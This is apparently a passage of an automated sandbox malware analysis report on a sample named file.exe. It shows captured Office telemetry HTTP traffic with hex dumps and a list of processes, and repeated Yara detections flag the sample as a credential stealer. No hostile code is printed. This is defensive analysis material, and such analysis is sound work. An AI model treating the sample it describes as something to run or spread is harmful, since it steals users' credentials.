                                                                                                                                                                              2024-11-21 07:31:16 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              148192.168.2.64991913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:17 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:17 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:17 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1370
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                              ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                              x-ms-request-id: a4032f19-b01e-0084-598d-3bd736000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073117Z-1777c6cb7549x5qchC1TEBggbg0000000atg00000000buve
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:17 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              149192.168.2.64992013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:17 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:18 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:17 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                              ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                              x-ms-request-id: 8149a5d6-a01e-001e-117b-3b49ef000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073117Z-1777c6cb754gc8g6hC1TEB966c0000000apg00000000grwn
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:18 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:02:30:05
                                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                              Imagebase:0x720000
                                                                                                                                                                              File size:1'881'088 bytes
                                                                                                                                                                              MD5 hash:370FC731525B5F7087A7DE06E2DE56E6
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2317125677.0000000001366000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2242304214.0000000001354000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2317070340.000000000135E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2242704780.0000000001354000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2243356851.0000000001354000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:02:30:42
                                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:02:30:43
                                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2500,i,13953253401504598883,18053136304032162563,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:02:30:50
                                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:02:30:50
                                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1972,i,11730012379210978219,17128229350723911199,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              No disassembly